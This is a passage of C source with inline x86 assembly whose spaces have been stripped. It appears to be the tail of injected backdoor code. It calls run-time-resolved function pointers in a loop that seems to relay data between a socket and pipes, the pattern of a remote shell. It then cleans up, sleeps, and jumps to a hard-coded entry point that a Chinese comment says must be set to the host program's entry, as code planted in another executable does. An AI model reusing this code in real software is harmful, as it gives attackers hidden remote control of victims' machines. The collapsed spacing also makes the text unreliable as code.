- calldwordptr[ebp-4044h]
- mov[ebp-1E8h],eax
- loc_004012B6:
- cmpdwordptr[ebp-1E8h],0
- jaloc_004012C4
- jmploc_00401417
- loc_004012C4:
- push0
- leaeax,[ebp-1E8h]
- pusheax
- movecx,[ebp-1E8h]
- pushecx
- leaedx,[ebp-11E8h]
- pushedx
- moveax,[ebp-1E0h]
- pusheax
- calldwordptr[ebp-401Ch]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jnzloc_004012FC
- jmploc_00401415
- loc_004012FC:
- cmpdwordptr[ebp-11ECh],0
- jnzloc_0040132A
- push0
- leaecx,[ebp-1E8h]
- pushecx
- push1
- leaedx,[ebp-1340h]
- pushedx
- moveax,[ebp-1E0h]
- pusheax
- calldwordptr[ebp-401Ch]
- mov[ebp-11F0h],eax
- loc_0040132A:
- cmpdwordptr[ebp-11F0h],0
- jnzloc_00401338
- jmploc_00401413
- loc_00401338:
- push1000h
- push0
- leaecx,[ebp-11E8h]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- push0
- leaedx,[ebp-4]
- pushedx
- push0
- push0
- push0
- moveax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4020h]
- cmpdwordptr[ebp-4],0
- jbeloc_004013C3
- push0
- leaecx,[ebp-1E8h]
- pushecx
- movedx,[ebp-4]
- pushedx
- leaeax,[ebp-11E8h]
- pusheax
- movecx,[ebp-38h]
- pushecx
- calldwordptr[ebp-4024h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jnzloc_00401399
- jmploc_00401411
- loc_00401399:
- push0
- movedx,[ebp-4]
- pushedx
- leaeax,[ebp-11E8h]
- pusheax
- movecx,[ebp-12F8h]
- pushecx
- calldwordptr[ebp-4048h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jgloc_004013C3
- jmploc_0040140F
- loc_004013C3:
- jmploc_004011E8
- loc_004013C8:
- movedx,[ebp-1E0h]
- pushedx
- calldwordptr[ebp-4010h]
- moveax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4010h]
- movecx,[ebp-2Ch]
- pushecx
- calldwordptr[ebp-4010h]
- movedx,[ebp-34h]
- pushedx
- calldwordptr[ebp-4010h]
- moveax,[ebp-12F8h]
- pusheax
- calldwordptr[ebp-403Ch]
- push3E8h
- calldwordptr[ebp-4018h]
- jmploc_004010F7
- loc_0040140F:
- jmploc_004013C8
- loc_00401411:
- jmploc_004013C8
- loc_00401413:
- jmploc_004013C8
- loc_00401415:
- jmploc_004013C8
- loc_00401417:
- jmploc_004013C8
- loc_00401419:
- movesp,ebp
- popebp
- ret
- }
- /////////////////////////////////////////////////////////////
- ex:
- _asm
- {
- popecx
- pushecx
- ret
- }
- ex1:
- _asm
- {
- callex
- ret
- }
- exit1:
- ///////////////////////////////////////////////////////////////
- _asm
- {
- moveax,0x401000//这里需要更改为程序人口
- jmpeax
- }
- return0;
- }